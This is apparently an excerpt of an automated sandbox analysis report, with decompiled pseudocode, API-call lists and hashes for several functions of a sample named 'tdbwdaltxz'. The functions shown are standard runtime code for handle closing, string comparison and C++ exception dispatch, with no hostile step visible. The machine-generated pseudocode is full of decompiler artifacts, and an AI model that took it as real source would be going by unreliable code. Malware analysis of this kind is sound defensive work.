                        0x01072853
                        0x01072853
                        0x01072863
                        0x00000000
                        0x01072865
                        0x0107286b
                        0x0107286b
                        0x01072863
                        0x01072851
                        0x01072827
                        0x01072872
                        0x0107288a
                        0x01072891
                        0x0107289f
                        0x01072893
                        0x0107289a
                        0x0107289a
                        0x010728a4
                        0x01072809
                        0x0107280d
                        0x0107280d

                        APIs
                        • __ioinit.LIBCMT ref: 01072800
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 010665A2
                        • __get_osfhandle.LIBCMT ref: 01072814
                        • __get_osfhandle.LIBCMT ref: 0107283F
                        • __get_osfhandle.LIBCMT ref: 01072848
                        • __get_osfhandle.LIBCMT ref: 01072854
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,01071CC9,?,?,?,?,?,?,?,?,?,?,00000109), ref: 0107285B
                        • GetLastError.KERNEL32(?,01071CC9,?,?,?,?,?,?,?,?,?,?,00000109), ref: 01072865
                        • __free_osfhnd.LIBCMT ref: 01072872
                        • __dosmaperr.LIBCMT ref: 01072894
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                        • String ID:
                        • API String ID: 974577687-0
                        • Opcode ID: ed8b67492e3c42d3590f289d0681df3fd925fee0d1afcbd47e5e752ab5e75256
                        • Instruction ID: 9fef578164fdaac27f12ba87d1b6efbd86cbd04ca8f238af5d800b99a46bf208
                        • Opcode Fuzzy Hash: ed8b67492e3c42d3590f289d0681df3fd925fee0d1afcbd47e5e752ab5e75256
                        • Instruction Fuzzy Hash: 4D114C32E0721405D2E1227CA8447BE7B895FA2B34F15039DF9E9D71CADA77E881C358
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010619F0 Relevance: 13.6, APIs: 9, Instructions: 59memorystringthreadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E010619F0(WCHAR* _a4, char* _a8) {
				int _t11;
				int _t18;
				void* _t26;
				int _t28;

				_t28 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
				if(_t28 != 0) {
					_t11 = lstrlenW(_a4);
					_t3 = _t28 - 1; // -1
					if(_t11 < _t3) {
						goto L1;
					} else {
						_t26 = HeapAlloc(GetProcessHeap(), 0, _t28 + _t28);
						MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t26, _t28);
						_t6 = _t28 - 1; // -1
						_t18 = CompareStringW(GetThreadLocale(), 1, _a4, _t6, _t26, _t6);
						HeapFree(GetProcessHeap(), 0, _t26);
						return 0 | _t18 == 0x00000002;
					}
				} else {
					L1:
					return 0;
				}
			}







                        0x01061a07
                        0x01061a0b
                        0x01061a17
                        0x01061a1d
                        0x01061a22
                        0x00000000
                        0x01061a24
                        0x01061a39
                        0x01061a45
                        0x01061a4b
                        0x01061a5d
                        0x01061a6f
                        0x01061a80
                        0x01061a80
                        0x01061a0d
                        0x01061a0d
                        0x01061a11
                        0x01061a11

                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061A01
                        • lstrlenW.KERNEL32(?), ref: 01061A17
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061A2B
                        • HeapAlloc.KERNEL32(00000000), ref: 01061A32
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061A45
                        • GetThreadLocale.KERNEL32(00000001,?,-00000001,00000000,-00000001), ref: 01061A56
                        • CompareStringW.KERNEL32(00000000), ref: 01061A5D
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061A68
                        • HeapFree.KERNEL32(00000000), ref: 01061A6F
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$ByteCharMultiProcessWide$AllocCompareFreeLocaleStringThreadlstrlen
                        • String ID:
                        • API String ID: 3897715424-0
                        • Opcode ID: 8a44a3cfc130ae6e0d3971429a61a1c5afb9823e3839bf1964925b9c7876fa39
                        • Instruction ID: 50280af81effd8d66e6d83fbd8a61d2c07757c83eaa4250eec8d050b21c0e330
                        • Opcode Fuzzy Hash: 8a44a3cfc130ae6e0d3971429a61a1c5afb9823e3839bf1964925b9c7876fa39
                        • Instruction Fuzzy Hash: 20118072944215BBDB321BB4EC0DF9B7B6DEB48762F104614F7A5EA0C4DA769400CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061960 Relevance: 13.6, APIs: 9, Instructions: 58memorystringthreadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01061960(WCHAR* _a4, char* _a8) {
				int _t10;
				int _t17;
				void* _t24;
				int _t26;

				_t26 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
				if(_t26 != 0) {
					_t10 = lstrlenW(_a4);
					_t3 = _t26 - 1; // -1
					if(_t10 != _t3) {
						goto L1;
					} else {
						_t24 = HeapAlloc(GetProcessHeap(), 0, _t26 + _t26);
						MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t24, _t26);
						_t17 = CompareStringW(GetThreadLocale(), 1, _a4, _t26, _t24, _t26);
						HeapFree(GetProcessHeap(), 0, _t24);
						return 0 | _t17 == 0x00000002;
					}
				} else {
					L1:
					return 0;
				}
			}







                        0x01061977
                        0x0106197b
                        0x01061987
                        0x0106198d
                        0x01061992
                        0x00000000
                        0x01061994
                        0x010619a9
                        0x010619b5
                        0x010619ca
                        0x010619dc
                        0x010619ed
                        0x010619ed
                        0x0106197d
                        0x0106197d
                        0x01061981
                        0x01061981

                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061971
                        • lstrlenW.KERNEL32(?), ref: 01061987
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0106199B
                        • HeapAlloc.KERNEL32(00000000), ref: 010619A2
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010619B5
                        • GetThreadLocale.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 010619C3
                        • CompareStringW.KERNEL32(00000000), ref: 010619CA
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010619D5
                        • HeapFree.KERNEL32(00000000), ref: 010619DC
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$ByteCharMultiProcessWide$AllocCompareFreeLocaleStringThreadlstrlen
                        • String ID:
                        • API String ID: 3897715424-0
                        • Opcode ID: 562e6d8e362c46715b4fa1c9f3be890b228a2c909332fc93da3198dfd52f9f21
                        • Instruction ID: 888bccb101bcd1cd35b9d403740cb586c337398a57f3fe73a3903366a2ceca2a
                        • Opcode Fuzzy Hash: 562e6d8e362c46715b4fa1c9f3be890b228a2c909332fc93da3198dfd52f9f21
                        • Instruction Fuzzy Hash: 05014032944214BBDB321BB4AC0DF9B7F6DEF45761F104611F6A5EA1C4DA769400CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004038EB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E004038EB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E004044A9(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E0040579A(_t270, _t275, _t296, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E004029B3(_t271, _t275, _t296, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E004029B3(_t271, _t275, _t296, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00402E31(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00402D64(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E0040386B(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E0040579A(_t271, _t275, _t296, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E004029B3(_t270, _t275, _t296, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E004029B3(_t270, _t275, _t296, 0) + 0x10);
								_t259 = E004029B3(_t270, _t275, _t296, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E00402D64(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E0040386B(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0040263C(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E004029B3(_t270, _t275, _t296, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E0040436A(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
																	_t237 = E004029B3(_t270, _t275, _t296, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c));
										_t264 = E004029B3(_t270, _t275, _t296, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E0040436A(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E004056DE(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E00403FC6( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4158ac) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E0040263C(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E00403F71( &_v64);
											E0040225B( &_v64, 0x413554);
											L64:
											 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
											_t231 = E004029B3(_t270, _t275, _t296, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E00402F57(_t275, _t315, _t270);
											E0040426A(_a8, _a16, _t301);
											_t234 = E00404427(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E004041E1(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}






















































































                        0x004038eb
                        0x004038f2
                        0x004038f4
                        0x004038fd
                        0x00403903
                        0x0040390b
                        0x0040390d
                        0x00403910
                        0x00403916
                        0x00403c8a
                        0x00403c8a
                        0x00403c8f
                        0x00403c91
                        0x00403c93
                        0x00403c96
                        0x00403c97
                        0x00403c9a
                        0x00403ca0
                        0x00403dbf
                        0x00403ca6
                        0x00403ca6
                        0x00403ca7
                        0x00403ca8
                        0x00403caf
                        0x00403cb2
                        0x00403cb5
                        0x00403cbb
                        0x00403cbd
                        0x00403cc2
                        0x00403cc5
                        0x00403cc7
                        0x00403ccd
                        0x00403ccf
                        0x00403cd5
                        0x00403cea
                        0x00403cef
                        0x00403cf2
                        0x00403cf4
                        0x00403dbb
                        0x00000000
                        0x00403dbc
                        0x00403cf4
                        0x00403cd5
                        0x00403ccd
                        0x00403cc5
                        0x00403cfa
                        0x00403cfd
                        0x00403d00
                        0x00403d03
                        0x00403d06
                        0x00403d0c
                        0x00403d1e
                        0x00403d23
                        0x00403d26
                        0x00403d29
                        0x00403d2c
                        0x00403d2f
                        0x00403d32
                        0x00403d35
                        0x00000000
                        0x00000000
                        0x00403d3b
                        0x00403d3b
                        0x00403d3e
                        0x00403d41
                        0x00403d50
                        0x00403d51
                        0x00403d51
                        0x00403d53
                        0x00403d56
                        0x00000000
                        0x00000000
                        0x00403d58
                        0x00403d5b
                        0x00000000
                        0x00000000
                        0x00403d69
                        0x00403d6b
                        0x00403d6e
                        0x00403d70
                        0x00403d78
                        0x00403d78
                        0x00403d7b
                        0x00403d7d
                        0x00403d7f
                        0x00403d9b
                        0x00403da0
                        0x00403da3
                        0x00403da3
                        0x00000000
                        0x00403d7b
                        0x00403d72
                        0x00403d76
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403da6
                        0x00403da9
                        0x00403daa
                        0x00403dad
                        0x00403db0
                        0x00403db3
                        0x00403db6
                        0x00403db6
                        0x00000000
                        0x00403d41
                        0x00403dc0
                        0x00403dc5
                        0x00403dc6
                        0x00403dc9
                        0x00403dcc
                        0x00403dcd
                        0x00403dce
                        0x00403dcf
                        0x00403dd2
                        0x00403dd4
                        0x00403e4c
                        0x00403e4e
                        0x00403e4e
                        0x00403dd6
                        0x00403dd6
                        0x00403dd9
                        0x00403ddc
                        0x00000000
                        0x00403dde
                        0x00403dde
                        0x00403de1
                        0x00403de4
                        0x00403deb
                        0x00403deb
                        0x00403dee
                        0x00403df0
                        0x00403df2
                        0x00403e24
                        0x00403e24
                        0x00403e27
                        0x00403e2e
                        0x00403e2e
                        0x00403e31
                        0x00403e34
                        0x00403e3b
                        0x00403e3b
                        0x00403e3e
                        0x00403e45
                        0x00403e47
                        0x00403e47
                        0x00403e40
                        0x00403e40
                        0x00403e43
                        0x00000000
                        0x00000000
                        0x00403e43
                        0x00403e36
                        0x00403e36
                        0x00403e39
                        0x00000000
                        0x00000000
                        0x00403e39
                        0x00403e29
                        0x00403e29
                        0x00403e2c
                        0x00000000
                        0x00000000
                        0x00403e2c
                        0x00403e48
                        0x00403df4
                        0x00403df4
                        0x00403df4
                        0x00403df7
                        0x00403df7
                        0x00403df9
                        0x00403dfb
                        0x00000000
                        0x00000000
                        0x00403dfd
                        0x00403dff
                        0x00403e13
                        0x00403e13
                        0x00403e01
                        0x00403e01
                        0x00403e04
                        0x00403e07
                        0x00000000
                        0x00403e09
                        0x00403e09
                        0x00403e0c
                        0x00403e0f
                        0x00403e11
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403e11
                        0x00403e07
                        0x00403e1c
                        0x00403e1c
                        0x00403e1e
                        0x00000000
                        0x00403e20
                        0x00403e20
                        0x00403e20
                        0x00000000
                        0x00403e1e
                        0x00403e17
                        0x00403e19
                        0x00403e19
                        0x00000000
                        0x00403e19
                        0x00403de6
                        0x00403de6
                        0x00403de9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403de9
                        0x00403de4
                        0x00403ddc
                        0x00403e4f
                        0x00403e53
                        0x00403e53
                        0x00403925
                        0x00403925
                        0x0040392e
                        0x00403a2b
                        0x00403a2b
                        0x00403a2e
                        0x00000000
                        0x0040395d
                        0x0040395d
                        0x00403962
                        0x00000000
                        0x00403968
                        0x00403968
                        0x00403970
                        0x00403c24
                        0x00403c28
                        0x00403976
                        0x0040397b
                        0x0040397e
                        0x00403983
                        0x0040398a
                        0x0040398f
                        0x00000000
                        0x004039c7
                        0x004039cf
                        0x00403a33
                        0x00403a33
                        0x00403a36
                        0x00403a39
                        0x00403a3b
                        0x00403a3e
                        0x00403a41
                        0x00403a47
                        0x00403bf3
                        0x00403bf3
                        0x00403bf6
                        0x00000000
                        0x00403bf8
                        0x00403bf8
                        0x00403bfb
                        0x00000000
                        0x00403c01
                        0x00403c01
                        0x00403c04
                        0x00403c07
                        0x00403c08
                        0x00403c09
                        0x00403c0c
                        0x00403c0d
                        0x00403c10
                        0x00403c11
                        0x00403c16
                        0x00000000
                        0x00403c16
                        0x00403bfb
                        0x00403a4d
                        0x00403a4d
                        0x00403a51
                        0x00000000
                        0x00403a57
                        0x00403a57
                        0x00403a5e
                        0x00403a76
                        0x00403a76
                        0x00403a79
                        0x00403a7c
                        0x00403a82
                        0x00403a92
                        0x00403a97
                        0x00403a9a
                        0x00403a9d
                        0x00403aa0
                        0x00403aa3
                        0x00403aa6
                        0x00403aa9
                        0x00403aaf
                        0x00403aaf
                        0x00403ab2
                        0x00403ab5
                        0x00403ac4
                        0x00403ac5
                        0x00403ac5
                        0x00403ac7
                        0x00403aca
                        0x00403ad0
                        0x00403ad3
                        0x00403ad9
                        0x00403adb
                        0x00403ade
                        0x00403ae1
                        0x00403ae7
                        0x00403aea
                        0x00403aef
                        0x00403aef
                        0x00403af2
                        0x00403af5
                        0x00403af8
                        0x00403afb
